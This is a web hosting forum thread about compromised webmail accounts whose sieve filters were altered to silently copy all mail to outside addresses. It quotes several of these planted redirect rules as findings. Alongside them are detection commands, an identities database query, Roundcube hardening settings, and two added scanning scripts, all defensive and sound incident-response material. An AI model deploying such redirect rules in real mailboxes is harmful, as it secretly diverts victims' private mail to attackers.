Issue dovecot / roundcube sieve hack

tkalfaoglu

Silver Pleskian
Today a customer complained that their email might be compromised.
I found that a single email address had a sieve added:

.dovecot.sieve -> sieve/roundcube.sieve

and that file contained:
# rule:[.]
if allof (header :contains "from" "@")
{
redirect :copy "[email protected]";
}
require ["copy"];

PS: You may wish to do a check of your systems, just do a:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec echo grep redirect {} \;

My question was this: I guess they got the person's email address and using webmail, added a redirect. How can this be prevented?
Thanks, -tk
 
PS: this gmail email address appears in the whois registry of prornec.com which is located in Lagos, Nigeria!
 
PS: Looking at PLESK mail accounts page, there appears to be NO redirect.
Perhaps PLESK should also check these sieve settings when it displays the list of emails - and not only the redirects that have been placed using the PLESK interface..
 
The prornec.com domain was hosted on servers in Romania, with the IP range:
45.89.175.0 - 45.89.175.255
 
Sorry - the command should have been:

cd /var/qmail/mailnames
find . -name roundcube.sieve -exec grep redirect {} \;

the echo was my debug version :) -t
 
Have a look at the config file of Roundcube's managesieve plugin. There are some options that might prevent creating similar rules through Roundcube. The $config['managesieve_raw_editor'] and $config['managesieve_forward'] options seem useful to restrict in this regard.

Needless to say that it is always best to make every effort to protect user/email accounts so to prevent unauthorized access in the first place.
 
Many thanks. The forward option does not contain a disable option:

Code:
// Enables separate management interface for setting forwards (redirect to and copy to)
// 0 - no separate section (default),
// 1 - add Forward section,
// 2 - add Forward section, but hide Filters section
$config['managesieve_forward'] = 0;

In any case, I changed it to 2 and will check its impact. Likewise I'm going to disable the managesieve plugin.
 
I noticed the same issue with Horde as well. Someone hacked some people's ingo.sieve files to put redirects..
Nothing visible in the plesk interface, so I assume it was done via the horde interface.
 
We had the same issue; I highly recommend everyone check their sieve files (.dovecot.sieve, roundcube.sieve, ingo.sieve). You can check with this simple line:

find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep 'copy'
or
find /var/qmail/mailnames/ -type f -name '*sieve' | xargs grep '@'

Note: some of these filters may have been set by the users themselves; check them with the users.

Sample of our findings:

#1

if allof (header :contains "subject" "@")
{
redirect :copy "[email protected]";
}
require ["fileinto"];
require "fileinto";

#2

if true
{
redirect :copy "[email protected]";
}
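The checks in this post and in the first post (grep for redirect/copy across the mailnames tree), as an added example script that is not from the thread: it walks the tree, pulls every redirect target out of each sieve file, and marks targets whose domain is not hosted on the server, which is what the planted rules above look like. The /var/qmail/mailnames layout and the hosted-domains list file are assumptions, and the demo tree is constructed.

```shell
#!/bin/sh
# Added example (not from the thread): walk a mailnames tree, find every
# *sieve file carrying a "redirect" action and print one line per target:
#   <file> <target-address> <local|EXTERNAL>
# A target whose domain is not in the hosted-domains list is marked EXTERNAL,
# the pattern reported above (all mail silently copied to an outside mailbox).
# Rules are only reported, never deleted: some forwards are legitimately user-set.

# scan_sieve_redirects MAILROOT HOSTED_DOMAINS_FILE
#   MAILROOT: e.g. /var/qmail/mailnames; HOSTED_DOMAINS_FILE: one lower-case domain per line
scan_sieve_redirects() {
    find "$1" -type f -name '*sieve' | sort | while read -r f; do
        # matches both  redirect "a@b"  and  redirect :copy "a@b"
        grep -oE 'redirect[[:space:]]*(:copy[[:space:]]*)?"[^"]*"' "$f" 2>/dev/null |
        sed 's/.*"\([^"]*\)"/\1/' | while read -r target; do
            domain=$(printf '%s' "$target" | sed 's/.*@//' | tr 'A-Z' 'a-z')
            if grep -qxF "$domain" "$2"; then
                printf '%s %s local\n' "$f" "$target"
            else
                printf '%s %s EXTERNAL\n' "$f" "$target"
            fi
        done
    done
}

# Constructed demo tree mirroring the thread's findings (no real mailboxes).
make_demo_tree() {
    demo=$(mktemp -d)
    mkdir -p "$demo/example.com/alice/sieve" "$demo/example.com/bob/sieve"
    # Planted rule: copy every message that has a From header to an outside address
    printf '%s\n' '# rule:[.]' 'if allof (header :contains "from" "@")' '{' \
        'redirect :copy "outside-mailbox@example.net";' '}' 'require ["copy"];' \
        > "$demo/example.com/alice/sieve/roundcube.sieve"
    # Legitimate user forward to another mailbox hosted on this server
    printf 'redirect "bob@example.com";\n' > "$demo/example.com/bob/sieve/roundcube.sieve"
    printf 'example.com\n' > "$demo/hosted.txt"
    printf '%s' "$demo"
}

demo=$(make_demo_tree)
scan_sieve_redirects "$demo" "$demo/hosted.txt"
```

On a real server, run it as `scan_sieve_redirects /var/qmail/mailnames hosted-domains.txt` and review the EXTERNAL lines with the mailbox owners before touching any file.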
 
Just to document here in case anyone else is ever looking for the possibility to disable the redirect/copy-to option in Roundcube.
I was looking into that, because these sieve redirects circumvent the SRS filter of Plesk and thus will cause SPF troubles.

In /usr/share/psa-roundcube/plugins/managesieve/config.inc.php, add redirect to the managesieve_disabled_actions parameter, i.e.:
Code:
$config['managesieve_disabled_actions'] = ['redirect'];

I only fear that this config file may get overwritten on updates, so keep an eye out for that.
 
As an additional note, this only works for RC version 1.5 and up, which is currently not available on Plesk for CentOS 7.9 and Ubuntu 18.04.
 
Hi,

I'm bumping this thread because, in addition to the copy and redirect roundcube filters discussed here, I've come across another roundcube hack symptom: creating a new "fake" identity.

To check this you must log in to the Plesk DB:
Code:
plesk db;
use roundcubemail;
select user_id, changed, del,name, email from identities;

In the select output, check the email column; it is usually an email address not hosted on the server.
 
Yes, sadly identity creation is unrestricted in Roundcube by default. You can restrict the creation of additional identities in Roundcube with the $config['identities_level'] option using a value of either 3 or 4 in the config.inc.php file.

All config options for identities_level are explained here:
 
Didn't know this option, perfect!

Also, I would recommend turning on the userlogins option: $config['log_logins'] = true;
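An added example, not from the thread or from Plesk/Roundcube, that audits the three settings recommended in this thread (managesieve_disabled_actions with redirect, identities_level 3 or 4, log_logins) so that a config.inc.php rewritten by an update, the concern raised above, gets noticed. It assumes the settings live in the main config.inc.php and the managesieve plugin's config.inc.php as described in the posts; the sample config files are constructed.

```shell
#!/bin/sh
# Added example, not from the thread or from Plesk/Roundcube: audit the
# Roundcube settings recommended above so that an update rewriting
# config.inc.php (a concern raised above) is noticed. Pass the main
# config.inc.php and the managesieve plugin's config.inc.php.
audit_roundcube_config() {
    # Drop commented-out lines so a "// $config[...]" sample does not count.
    active=$(cat "$@" | grep -vE '^[[:space:]]*(//|#|\*)' || true)
    if printf '%s\n' "$active" | grep -qE "managesieve_disabled_actions'\].*'redirect'"; then
        echo "OK   managesieve: redirect action disabled"
    else
        echo "WARN managesieve: redirect action still allowed (option needs Roundcube >= 1.5)"
    fi
    if printf '%s\n' "$active" | grep -qE "identities_level'\][[:space:]]*=[[:space:]]*[34]"; then
        echo "OK   identities: creation of new identities restricted"
    else
        echo "WARN identities: users may add arbitrary identities (set identities_level 3 or 4)"
    fi
    if printf '%s\n' "$active" | grep -qE "log_logins'\][[:space:]]*=[[:space:]]*true"; then
        echo "OK   log_logins enabled"
    else
        echo "WARN log_logins disabled, no audit trail of webmail logins"
    fi
}

# Prints the number of WARN lines to stdout; always exits 0.
count_config_warnings() {
    audit_roundcube_config "$@" | grep -c '^WARN' || true
}

# Constructed sample configs (one permissive, one hardened), not from any real server.
write_demo_configs() {
    dir=$(mktemp -d)
    cat > "$dir/weak.inc.php" <<'EOF'
<?php
// $config['managesieve_disabled_actions'] = ['redirect'];
$config['identities_level'] = 0;
$config['log_logins'] = false;
EOF
    cat > "$dir/hardened.inc.php" <<'EOF'
<?php
$config['managesieve_disabled_actions'] = ['redirect'];
$config['identities_level'] = 3;
$config['log_logins'] = true;
EOF
    printf '%s' "$dir"
}

audit_roundcube_config "$(write_demo_configs)/weak.inc.php"
```

Run it from cron after Plesk updates, e.g. `count_config_warnings /usr/share/psa-roundcube/config/config.inc.php /usr/share/psa-roundcube/plugins/managesieve/config.inc.php`, and alert on any non-zero count.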
 